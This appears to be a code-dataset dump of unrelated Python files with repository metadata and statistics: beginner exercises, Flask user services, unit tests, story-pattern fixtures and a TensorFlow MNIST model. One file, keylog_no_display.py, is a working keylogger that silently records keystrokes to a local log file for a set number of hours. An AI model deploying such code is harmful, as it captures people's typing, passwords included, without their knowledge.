] | null | null | null | Ex0014/ex0014.py | Rodrigo-Antonio-Silva/ExerciciosPythonCursoemVideo | 3b2d68094dd5d60f0e45a75590eb2be9be030640 | [
"MIT"
] | null | null | null | #utf-8
#Exercício 14 do curso em vídeo de Python
celsius = float((input('Informe a temperatura em °C: ')))
#transformando de celsius para fahrenheit
fahr = (celsius * 9/5) + 32
print('A temperatura de {}°C corresponde a {}°F!'.format(celsius, fahr))
| 26.2 | 73 | 0.675573 | 42 | 262 | 4.285714 | 0.690476 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032864 | 0.187023 | 262 | 9 | 74 | 29.111111 | 0.798122 | 0.324427 | 0 | 0 | 0 | 0 | 0.424242 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd33fb997d932e9651b3a4a601eb452df40b550 | 370 | py | Python | NestedLoops/SpecialNumbers.py | Mirkonito/Softuni-Python-Basic | 762b80ea1e0d087613925cde9a03312c83b78168 | [
"MIT"
] | 1 | 2020-09-22T13:25:34.000Z | 2020-09-22T13:25:34.000Z | NestedLoops/SpecialNumbers.py | Mirkonito/Softuni-Python-Basic | 762b80ea1e0d087613925cde9a03312c83b78168 | [
"MIT"
] | null | null | null | NestedLoops/SpecialNumbers.py | Mirkonito/Softuni-Python-Basic | 762b80ea1e0d087613925cde9a03312c83b78168 | [
"MIT"
] | 1 | 2020-10-17T09:27:46.000Z | 2020-10-17T09:27:46.000Z | number = int(input())
for numbers in range(1111, 9999):
is_Magic = True
number_as_string = str(numbers)
for digit in number_as_string:
if int(digit) == 0:
is_Magic = False
break
elif number % int(digit) != 0:
is_Magic = False
break
if is_Magic:
print(f"{number_as_string}", end=" ") | 28.461538 | 45 | 0.551351 | 49 | 370 | 3.959184 | 0.489796 | 0.14433 | 0.216495 | 0.113402 | 0.268041 | 0.268041 | 0.268041 | 0 | 0 | 0 | 0 | 0.041322 | 0.345946 | 370 | 13 | 45 | 28.461538 | 0.760331 | 0 | 0 | 0.307692 | 0 | 0 | 0.051213 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd49ebaea1513f51afa5fbff160017ddd106d58 | 1,028 | py | Python | pyscrap3/template/+package.name+/+package.name+/items.py | Zincr0/pyscrap3 | 2eaf03f3598953eddfd6df9de3ea85ee0b75d441 | [
"Apache-2.0"
] | 1 | 2015-01-17T13:16:25.000Z | 2015-01-17T13:16:25.000Z | pyscrap3/template/+package.name+/+package.name+/items.py | Zincr0/pyscrap3 | 2eaf03f3598953eddfd6df9de3ea85ee0b75d441 | [
"Apache-2.0"
] | null | null | null | pyscrap3/template/+package.name+/+package.name+/items.py | Zincr0/pyscrap3 | 2eaf03f3598953eddfd6df9de3ea85ee0b75d441 | [
"Apache-2.0"
] | null | null | null | #you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from pyscrap3 import Item
from pyscrap3 import ItemList
class DemoItem(Item):
"""Los Item son ideales para guardar contenido único como el
título de una página o el cuerpo de una noticia."""
def __init__(self):
super().__init__()
self.newfield("title")
self.newfield("body")
class DemoListItems(ItemList):
"""Las ItemList son ideales para guardar multiples contenidos
agrupados, como todos los comentarios de un solo autor."""
def __init__(self):
super().__init__()
self.newfield("author")
| 34.266667 | 73 | 0.727626 | 146 | 1,028 | 5.013699 | 0.671233 | 0.068306 | 0.040984 | 0.057377 | 0.087432 | 0.087432 | 0.087432 | 0 | 0 | 0 | 0 | 0.004837 | 0.195525 | 1,028 | 29 | 74 | 35.448276 | 0.88029 | 0.653697 | 0 | 0.363636 | 0 | 0 | 0.045732 | 0 | 0 | 0 | 0 | 0.034483 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd578165db56b96203e8e97a41fc891e99c158b | 850 | py | Python | lib/horizontal_lines.py | rafelafrance/boyd-bird-journal | 289744703220015cb61d22a8e6f8eff0040b296f | [
"MIT"
] | null | null | null | lib/horizontal_lines.py | rafelafrance/boyd-bird-journal | 289744703220015cb61d22a8e6f8eff0040b296f | [
"MIT"
] | 5 | 2017-11-02T17:12:31.000Z | 2021-04-21T19:07:39.000Z | lib/horizontal_lines.py | rafelafrance/boyd-bird-journal | 289744703220015cb61d22a8e6f8eff0040b296f | [
"MIT"
] | null | null | null | """Contains logic that is unique to the horizontal grid lines."""
from lib.grid_lines import GridLines
class Horizontal(GridLines):
"""Contains logic that is unique to the horizontal grid lines."""
def __init__(self, image):
"""Build horizontal grid lines."""
super().__init__(image)
self.size = image.shape[1]
self.thetas = self.near_horiz
self.threshold = self.size * 0.4
def insert_line(self, from_this_line, distance=-50):
"""Insert a horizontal grid line relative to another line."""
point1 = [0, from_this_line[0][1] + distance]
point2 = [self.size, from_this_line[1][1] + distance]
self.add_line(point1, point2)
@staticmethod
def sort_key(key):
"""Horizontal lines are sorted by their distance on the y-axis."""
return key[0][1]
| 32.692308 | 74 | 0.645882 | 116 | 850 | 4.568966 | 0.448276 | 0.10566 | 0.107547 | 0.071698 | 0.184906 | 0.184906 | 0.184906 | 0.184906 | 0.184906 | 0.184906 | 0 | 0.024653 | 0.236471 | 850 | 25 | 75 | 34 | 0.791988 | 0.311765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd582135ab7d44f2ce3fd5f31c437f5392bb7ee | 1,419 | py | Python | Testing/StatusChangerTest.py | crzdg/TrainControlSystem | b75fa98eef7fbbe7b7c9a2ffaade40e8a9346962 | [
"MIT"
] | 2 | 2020-08-13T09:16:25.000Z | 2020-08-13T16:41:46.000Z | Testing/StatusChangerTest.py | crzdg/TrainControlSystem | b75fa98eef7fbbe7b7c9a2ffaade40e8a9346962 | [
"MIT"
] | null | null | null | Testing/StatusChangerTest.py | crzdg/TrainControlSystem | b75fa98eef7fbbe7b7c9a2ffaade40e8a9346962 | [
"MIT"
] | null | null | null | import StatusChanger.StatusChanger as StatusChanger
from States.States import States
import unittest
class StatusChangerTest(unittest.TestCase):
def test_motor(self):
# start motor, slow
StatusChanger.status_changer(132)
self.assertTrue(States.MOTOR_STARTED)
self.assertTrue(States.MOTOR_SLOW)
self.assertFalse(States.MOTOR_FAST)
# start motor, fast
StatusChanger.status_changer(122)
self.assertTrue(States.MOTOR_STARTED)
self.assertTrue(States.MOTOR_FAST)
self.assertFalse(States.MOTOR_SLOW)
# stop motor
StatusChanger.status_changer(192)
self.assertFalse(States.MOTOR_STARTED)
self.assertFalse(States.MOTOR_FAST)
self.assertFalse(States.MOTOR_SLOW)
def test_crane(self):
# crane loading
StatusChanger.status_changer(211)
self.assertTrue(States.CRANE_LOADING)
self.assertFalse(States.CRANE_LOADED)
# crane loaded
StatusChanger.status_changer(212)
self.assertTrue(States.CRANE_LOADED)
self.assertFalse(States.CRANE_LOADING)
def test_ir1(self):
StatusChanger.status_changer(312)
self.assertTrue(States.IR_1_STARTED)
def test_acceleration(self):
StatusChanger.status_changer(512)
self.assertTrue(States.ACCELERATION_STARTED)
if __name__ == '__main__':
unittest.main() | 30.191489 | 52 | 0.696265 | 153 | 1,419 | 6.228758 | 0.254902 | 0.103882 | 0.167891 | 0.136411 | 0.249738 | 0.202518 | 0.202518 | 0.202518 | 0.119622 | 0 | 0 | 0.020871 | 0.223397 | 1,419 | 47 | 53 | 30.191489 | 0.84392 | 0.051445 | 0 | 0.1875 | 0 | 0 | 0.005966 | 0 | 0 | 0 | 0 | 0 | 0.46875 | 1 | 0.125 | false | 0 | 0.09375 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cdcb8f44c6e045cceed885a2032e200b8e88365 | 4,563 | py | Python | modules/User/UserServices.py | Ankush1122/TripIndia | 9e53c7327df872fcae5365a5f78c3f54acbd138d | [
"MIT"
] | 3 | 2022-01-20T06:15:55.000Z | 2022-02-22T11:41:45.000Z | modules/User/UserServices.py | Ankush1122/TripIndia | 9e53c7327df872fcae5365a5f78c3f54acbd138d | [
"MIT"
] | null | null | null | modules/User/UserServices.py | Ankush1122/TripIndia | 9e53c7327df872fcae5365a5f78c3f54acbd138d | [
"MIT"
] | 1 | 2022-03-11T01:24:44.000Z | 2022-03-11T01:24:44.000Z | from flask import session
from User import UserRepo
import bcrypt
from datetime import date
class UserServices:
def __init__(self, db) -> None:
self.db = UserRepo.Repo(db)
def login(self, user):
if('@' not in user.userid or len(user.userid) < 3):
return [False, "Invalid Email"]
if(len(user.password) < 6):
return [False, "Incorrect Username or Password"]
userData = self.db.getUserById(user.userid)
if (userData[0]):
if (bcrypt.checkpw(str(user.password).encode('utf-8'), str(userData[1].password).encode('utf-8'))):
return userData
else:
return [False, "Incorrect Username or Password"]
else:
return [False, "User Does Not Exists, try signing up"]
def register(self, user):
if (self.db.isUserIdUsed(user.userid)):
print("user id already used")
return [False, "Email already registered"]
hashed = bcrypt.hashpw(
str(user.password).encode('utf-8'), bcrypt.gensalt())
user.password = hashed.decode()
if (self.db.addUser(user)):
print("user added successfully")
return [True, "Added User Successfully"]
else:
return [False, "Database Error"]
def validateData(self, name, email, password, confirmpassword, DOB, country):
if(name == "" or email == "" or password == "" or confirmpassword == "" or DOB == "" or country == ""):
return [False, "Please Fill all the Fields"]
if(" " not in name):
return [False, "Please Enter Full Name"]
if('@' not in email or len(email) < 3):
return [False, "Invalid Email Address"]
if(password != confirmpassword):
return [False, "Confirm password did not match"]
if(len(password) < 6):
return [False, "Password should consist of atleast 6 characters"]
return [True, "Valid Data"]
def activateUser(self, userid, verification):
self.db.updateUserVerificationStatus(userid, verification)
def signout(self):
print("signing out")
session.pop("index", None)
def getUserSession(self, index):
userData = self.db.getUserByIndex(index)
if (userData[0]):
print("session retrived successfully")
else:
self.signout()
return userData
def editProfile(self, user):
userData = self.db.getUserById(user.userid)
if(userData[0]):
if (bcrypt.checkpw(str(user.password).encode('utf-8'), str(userData[1].password).encode('utf-8'))):
user.password = userData[1].password
self.db.updateUserProfile(user)
return [True, "Profile Updated Succesfully"]
else:
return [False, "Incorrect password"]
else:
return [False, "User does not exist"]
def changePassword(self, currentpassword, newpassword, confirmpassword, userid):
if(newpassword != confirmpassword):
return [False, "Confirm password did not match"]
userData = self.db.getUserById(userid)
if(userData[0]):
if (bcrypt.checkpw(str(currentpassword).encode('utf-8'), str(userData[1].password).encode('utf-8'))):
hashed = bcrypt.hashpw(
str(newpassword).encode('utf-8'), bcrypt.gensalt())
self.db.updateUserPassword(hashed.decode(), userid)
return [True, "Password updated succesfully"]
else:
return [False, "Incorrect Current password"]
else:
return [False, "User does not exist"]
def addUserLog(self, userid, currenttime, success):
self.db.addUserLog(userid, currenttime, success)
def getUserName(self, userid):
userData = self.db.getUserById(userid)
return userData[1].name
def addView(self):
today = date.today()
dateToday = today.strftime("%b-%d-%Y")
userData = self.db.getVisitsByDate(dateToday)
if(userData[0]):
self.db.updateVisitsByDate(dateToday, userData[1] + 1)
else:
self.db.addDateToVisitsTable(dateToday)
def getTotalVisits(self):
data = self.db.getTotalVisits()
if(data[0]):
return data[1]
else:
return 0
def getNumberOfUsers(self):
data = self.db.getNumberOfUsers()
if(data[0]):
return data[1]
else:
return 0
| 36.214286 | 113 | 0.582731 | 490 | 4,563 | 5.418367 | 0.255102 | 0.040678 | 0.030132 | 0.040678 | 0.34049 | 0.287759 | 0.221092 | 0.208286 | 0.155932 | 0.102448 | 0 | 0.009645 | 0.295639 | 4,563 | 125 | 114 | 36.504 | 0.816428 | 0 | 0 | 0.358491 | 0 | 0 | 0.138505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.132075 | false | 0.216981 | 0.037736 | 0 | 0.433962 | 0.037736 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5cdfd7e1aeaff8d47ea33c610cb3c43f0e69f60b | 1,216 | py | Python | keylog_no_display.py | Reyogin/py-keylogger | 74d481864d2be8feafa19b1c3d533566326cda2d | [
"MIT"
] | null | null | null | keylog_no_display.py | Reyogin/py-keylogger | 74d481864d2be8feafa19b1c3d533566326cda2d | [
"MIT"
] | null | null | null | keylog_no_display.py | Reyogin/py-keylogger | 74d481864d2be8feafa19b1c3d533566326cda2d | [
"MIT"
] | null | null | null | from pynput.keyboard import Key, Listener
import logging
import datetime
import sys
log_file='/home/bertrand/Desktop/file_no_display.log'
logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(message)s')
message = ""
# stop = False
def on_press(key):
global message
if (hasattr(key, 'name')):
if key.name == 'space':
message += " "
elif key.name == 'enter':
#if key pressed is enter
logging.info(message)
if message == "end session":
exit(0)
message = ""
elif key.name == 'backspacet':
message = message[:-1]
else:
#TODO : handle ctrl and alt
logging.info(message)
logging.info(key.name)
message = ""
else:
if not key.char and key.vk == 65027:
return
message += key.char
def main(time):
start = datetime.datetime.now()
duration = datetime.timedelta(hours=int(time))
end = start + duration
current = datetime.datetime.now()
listener = Listener(on_press=on_press)
listener.start()
while current != end:
current = datetime.datetime.now()
main(sys.argv[1]) | 27.636364 | 81 | 0.583059 | 142 | 1,216 | 4.943662 | 0.464789 | 0.049858 | 0.081197 | 0.051282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009368 | 0.297697 | 1,216 | 44 | 82 | 27.636364 | 0.812646 | 0.050164 | 0 | 0.243243 | 0 | 0 | 0.077257 | 0.036458 | 0 | 0 | 0 | 0.022727 | 0 | 1 | 0.054054 | false | 0 | 0.108108 | 0 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a2548562ee5c125b5c6d758d30c09322862af85 | 1,989 | py | Python | tests/helpers/examples/failure_reasons/__init__.py | proofit404/userstories | aebfc088c8b7aab80a227e48e29be638411ffd86 | [
"BSD-2-Clause"
] | 187 | 2018-06-13T09:13:32.000Z | 2020-05-28T05:02:23.000Z | tests/helpers/examples/failure_reasons/__init__.py | supadrupa/stories | 3f1de66eae1216888eb5a7d2951013b8bbb4da25 | [
"BSD-2-Clause"
] | 426 | 2018-04-02T14:12:31.000Z | 2021-12-14T05:13:45.000Z | tests/helpers/examples/failure_reasons/__init__.py | proofit404/userstories | aebfc088c8b7aab80a227e48e29be638411ffd86 | [
"BSD-2-Clause"
] | 15 | 2018-11-03T09:03:38.000Z | 2020-05-10T17:16:47.000Z | from enum import Enum
from stories import story
# Base classes.
class ChildWithNull:
@story
def x(I):
I.one
class NextChildWithNull:
@story
def y(I):
I.two
class ParentWithNull:
@story
def a(I):
I.before
I.x
I.after
class SequenceParentWithNull:
@story
def a(I):
I.before
I.x
I.y
I.after
class ChildWithList:
@story
def x(I):
I.one
ChildWithList.x.failures(["foo", "bar", "baz"])
class NextChildWithList:
@story
def y(I):
I.two
NextChildWithList.y.failures(["spam", "ham", "eggs"])
class ParentWithList:
@story
def a(I):
I.before
I.x
I.after
ParentWithList.a.failures(["foo", "bar", "baz"])
class WideParentWithList:
@story
def a(I):
I.before
I.x
I.after
WideParentWithList.a.failures(["foo", "bar", "baz", "quiz"])
class ShrinkParentWithList:
@story
def a(I):
I.before
I.x
I.after
ShrinkParentWithList.a.failures(["foo", "quiz"])
class ChildWithEnum:
@story
def x(I):
I.one
@x.failures
class Errors(Enum):
foo = 1
bar = 2
baz = 3
class NextChildWithEnum:
@story
def y(I):
I.two
@y.failures
class Errors(Enum):
spam = 1
ham = 2
eggs = 3
class ParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@ParentWithEnum.a.failures
class Errors(Enum):
foo = 1
bar = 2
baz = 3
class WideParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@WideParentWithEnum.a.failures
class Errors(Enum): # noqa: F811
foo = 1
bar = 2
baz = 3
quiz = 4
class ShrinkParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@ShrinkParentWithEnum.a.failures
class Errors(Enum): # noqa: F811
foo = 1
quiz = 4
| 12.75 | 60 | 0.535445 | 248 | 1,989 | 4.294355 | 0.185484 | 0.105164 | 0.067606 | 0.075117 | 0.4723 | 0.412207 | 0.325822 | 0.325822 | 0.325822 | 0.239437 | 0 | 0.016342 | 0.353947 | 1,989 | 155 | 61 | 12.832258 | 0.812451 | 0.017597 | 0 | 0.714286 | 0 | 0 | 0.025128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.019048 | 0 | 0.419048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a2d91a2be0463ad110f4e50fcc81532e82c1deb | 2,401 | py | Python | python/multi_view_learning/nn_leaveOneOut.py | thekingofkings/chicago-crime | 30550697402aa3a5a074096a0032b0c1e1264313 | [
"MIT"
] | 10 | 2016-11-08T04:31:06.000Z | 2021-07-28T15:17:52.000Z | python/multi_view_learning/nn_leaveOneOut.py | thekingofkings/chicago-crime | 30550697402aa3a5a074096a0032b0c1e1264313 | [
"MIT"
] | 24 | 2016-04-19T15:07:52.000Z | 2017-05-20T02:29:23.000Z | python/multi_view_learning/nn_leaveOneOut.py | thekingofkings/urban-flow-analysis | 30550697402aa3a5a074096a0032b0c1e1264313 | [
"MIT"
] | 5 | 2016-09-13T21:13:46.000Z | 2019-12-04T11:40:02.000Z | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Tensor flow NN model for leave-one-out evaluation.
Created on Fri Apr 7 14:25:01 2017
@author: hxw186
"""
import tensorflow as tf
import numpy as np
import sys
sys.path.append("../")
from feature_evaluation import build_features
def leaveOneOut_error(Y, D, P, Tf, Yt, Gd, Yg, features=['all'], gwr_gamma=None, taxi_norm="bydestination"):
"""
Use GLM model from python statsmodels library to fit data.
Evaluate with leave-one-out setting, return the average of n errors.
Input:
features - a list features. ['all'] == ['demo', 'poi', 'geo', 'taxi']
gwr_gamma - the GWR weight matrx. TODO
Output:
error - the average error of k leave-one-out evaluation
"""
errors = []
for k in range(len(Y)):
with tf.Graph().as_default():
X_train, X_test, Y_train, Y_test = build_features(Y, D, P, Tf, Yt, Gd, Yg, k, features, taxi_norm)
# build the TF nn model
F1 = X_train.shape[1]
x1 = tf.placeholder(tf.float32, [None, F1], name="numeric_features_set1")
y = tf.placeholder(tf.float32, [None, 1], name="label")
W = tf.Variable(tf.random_normal([F1]), name="weight")
b = tf.Variable(tf.random_normal([1]), name="bias")
y_est = tf.add(tf.reduce_sum(tf.multiply(x1, W)), b)
# h1 = tf.layers.dense(inputs=x1, units=F1/2, activation=tf.nn.relu, use_bias=True,
# name="reduce_half", reuse=None)
# y_est = tf.layers.dense(inputs=x1, units=1, activation=None, use_bias=True,
# name="reg_pred", reuse=None)
objective = tf.reduce_mean(tf.squared_difference(y, y_est))
train_step = tf.train.GradientDescentOptimizer(0.1).minimize(objective)
tf_mae = tf.reduce_mean(tf.abs(y - y_est))
sess = tf.InteractiveSession()
sess.run(tf.global_variables_initializer())
train_step.run(feed_dict={x1: X_train, y: Y_train[:,None]})
yarray = np.array(Y_test).reshape((1,1))
mae = tf_mae.eval(feed_dict={x1: X_test[None,:], y: yarray})
errors.append(mae)
return np.mean(errors), np.mean(errors) / np.mean(Y)
| 34.3 | 110 | 0.573928 | 330 | 2,401 | 4.048485 | 0.448485 | 0.011976 | 0.024701 | 0.031437 | 0.152695 | 0.055389 | 0.016467 | 0 | 0 | 0 | 0 | 0.024089 | 0.291129 | 2,401 | 69 | 111 | 34.797101 | 0.76087 | 0.329863 | 0 | 0 | 0 | 0 | 0.035438 | 0.013531 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.038462 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a35bf0f4d9cc0c9d167afdd16979f69be3ead4a | 401 | py | Python | {{ cookiecutter.repo_name }}/{{cookiecutter.source_name}}/core/mixins/pickle_mixin.py | IngerMathilde/cookiecutter-data-science-dev | f0bec56aaf5b6b74b56241be47356fec957e34dc | [
"MIT"
] | 1 | 2022-01-18T22:52:10.000Z | 2022-01-18T22:52:10.000Z | {{ cookiecutter.repo_name }}/{{cookiecutter.source_name}}/core/mixins/pickle_mixin.py | IngerMathilde/cookiecutter-data-science-poetry-docker-makefile | f0bec56aaf5b6b74b56241be47356fec957e34dc | [
"MIT"
] | null | null | null | {{ cookiecutter.repo_name }}/{{cookiecutter.source_name}}/core/mixins/pickle_mixin.py | IngerMathilde/cookiecutter-data-science-poetry-docker-makefile | f0bec56aaf5b6b74b56241be47356fec957e34dc | [
"MIT"
] | null | null | null | import gzip
import pickle
class PickableMixin:
"""A mixins to make a class a pickable object"""
def dump(self, file_name: str) -> None:
with open('{}.pkl'.format(file_name), 'wb') as f:
pickle.dump(self, f)
@classmethod
def load(cls, file_name: str) -> 'PickableMixin':
with open('{}.pkl'.format(file_name), 'rb') as f:
return pickle.load(f)
| 26.733333 | 57 | 0.600998 | 56 | 401 | 4.232143 | 0.535714 | 0.135021 | 0.092827 | 0.14346 | 0.21097 | 0.21097 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25187 | 401 | 14 | 58 | 28.642857 | 0.79 | 0.104738 | 0 | 0 | 0 | 0 | 0.082153 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7a4859bc53bbe4a3b3dcad56a45d683fde79184d | 246 | py | Python | tests/runner/test_bobo3_profile.py | andyfase/awscfncli | 467297a93b74ac094202af980140f93b531800fd | [
"MIT"
] | 60 | 2017-01-16T09:52:36.000Z | 2021-09-07T23:27:01.000Z | tests/runner/test_bobo3_profile.py | andyfase/awscfncli | 467297a93b74ac094202af980140f93b531800fd | [
"MIT"
] | 103 | 2017-08-22T17:01:31.000Z | 2021-09-02T15:32:34.000Z | tests/runner/test_bobo3_profile.py | andyfase/awscfncli | 467297a93b74ac094202af980140f93b531800fd | [
"MIT"
] | 16 | 2017-08-22T16:24:11.000Z | 2021-06-30T11:45:51.000Z | from awscfncli2.runner import Boto3Profile
class TestStackSelector(object):
def test_update(self):
s1 = Boto3Profile('foo','bar')
s2 = Boto3Profile('foo', 'baz')
assert s1.region_name == 'bar'
s1.update(s2)
| 22.363636 | 42 | 0.634146 | 28 | 246 | 5.5 | 0.714286 | 0.194805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048128 | 0.239837 | 246 | 10 | 43 | 24.6 | 0.775401 | 0 | 0 | 0 | 0 | 0 | 0.060976 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a53b57a7b74cbdc2de72cbc43f9edd1ac439064 | 5,251 | py | Python | mnist_TF_layers.py | hughkong/asstarer | ed331aa2b4c7665f10214117510cfee099216ede | [
"Apache-2.0"
] | 1 | 2021-06-20T11:44:05.000Z | 2021-06-20T11:44:05.000Z | mnist_TF_layers.py | hughkong/asstarer | ed331aa2b4c7665f10214117510cfee099216ede | [
"Apache-2.0"
] | null | null | null | mnist_TF_layers.py | hughkong/asstarer | ed331aa2b4c7665f10214117510cfee099216ede | [
"Apache-2.0"
] | 2 | 2020-04-12T10:52:11.000Z | 2021-02-23T14:06:58.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from tensorflow.contrib import learn
from tensorflow.contrib import layers
from tensorflow.contrib import metrics
from tensorflow.contrib import framework
from tensorflow.contrib.learn import MetricSpec
from tensorflow.python.platform import tf_logging as logging
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
import math
from mlengine.digits import test_digits
logging.set_verbosity(logging.INFO)
# This sample shows how to write Tensorflow models using the high-level layers API
# in Tensorflow. Using high-level APIs, you do not have to define placeholders and
# variables yourself. Also, you will not need to write your own training loop by
# using the Estimator interface instead.
#
# WARNING: tensorflow.contrib.learn.* APIs are still experimental and can change in breaking ways
# as they mature. API stability will be ensured when tensorflow.contrib.learn becomes tensorflow.learn
# Download images and labels into mnist.test (10K images+labels) and mnist.train (60K images+labels)
mnist = read_data_sets("data", one_hot=False, reshape=True, validation_size=0)
# In memory training data for this simple case.
# When data is too large to fit in memory, use Tensorflow queues.
def train_data_input_fn():
return tf.train.shuffle_batch([tf.constant(mnist.train.images), tf.constant(mnist.train.labels)],
batch_size=100, capacity=1100, min_after_dequeue=1000, enqueue_many=True)
# Eval data is an in-memory constant here.
def eval_data_input_fn():
return tf.constant(mnist.test.images), tf.constant(mnist.test.labels)
# Test data for a predictions run
def predict_input_fn():
return tf.cast(tf.constant(test_digits), tf.float32)
# Model loss (not needed in INFER mode)
def conv_model_loss(Ylogits, Y_, mode):
return tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=Ylogits, labels=tf.one_hot(Y_,10))) * 100 \
if mode == learn.ModeKeys.TRAIN or mode == learn.ModeKeys.EVAL else None
# Model optimiser (only needed in TRAIN mode)
def conv_model_train_op(loss, mode):
return layers.optimize_loss(loss, framework.get_global_step(), learning_rate=0.003, optimizer="Adam",
# to remove learning rate decay, comment the next line
learning_rate_decay_fn=lambda lr, step: 0.0001 + tf.train.exponential_decay(lr, step, -2000, math.e)
) if mode == learn.ModeKeys.TRAIN else None
# Model evaluation metric (not needed in INFER mode)
def conv_model_eval_metrics(classes, Y_, mode):
# You can name the fields of your metrics dictionary as you like.
return {'accuracy': metrics.accuracy(classes, Y_)} \
if mode == learn.ModeKeys.TRAIN or mode == learn.ModeKeys.EVAL else None
# Model
def conv_model(X, Y_, mode):
XX = tf.reshape(X, [-1, 28, 28, 1])
biasInit = tf.constant_initializer(0.1, dtype=tf.float32)
Y1 = layers.conv2d(XX, num_outputs=6, kernel_size=[6, 6], biases_initializer=biasInit)
